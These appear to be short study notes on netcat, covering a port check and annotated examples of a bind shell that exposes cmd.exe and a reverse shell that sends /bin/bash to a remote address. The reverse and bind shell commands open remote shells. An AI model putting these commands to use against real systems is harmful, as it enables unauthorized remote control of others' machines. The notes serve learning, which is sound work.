## Netcat ```bash # check if a port is open nc-n -v 10.11.0.22 110 ``` ## REmote Administration With Netcat Consider this scenario, 2 people A and B each has a computer. A has a public ip address and is directly connected to the internet (like a server), B is not (like a client), has a internal ip address.  Suppose A has a Windows Machine and B has a linux machine (demonstration only, command exactly the same). Suppose A's public ip address is `<IP-Addr>` the `-e` option of netcat: program to exec after connect [dangerous!!] ### Netcat Bind Shell Scenario A sends shell to B and let B control A's computer. ```powershell # A nc -nlvp 4444 -e cmd.exe # Listening on port 4444, run cmd.exe after connection ``` ```bash # B nc -nv <IP-Addr> 4444 # B then gets the shell/cmd of A ``` ### Reverse Shell Scenario It's called reverse because B is sharing its shell to A this time. ```powershell # A nc -nlvp 4444 # Listening on port 4444 ``` ```bash # B nc -nv <IP-Addr> 4444 -e /bin/bash # send bash shell to ip address ```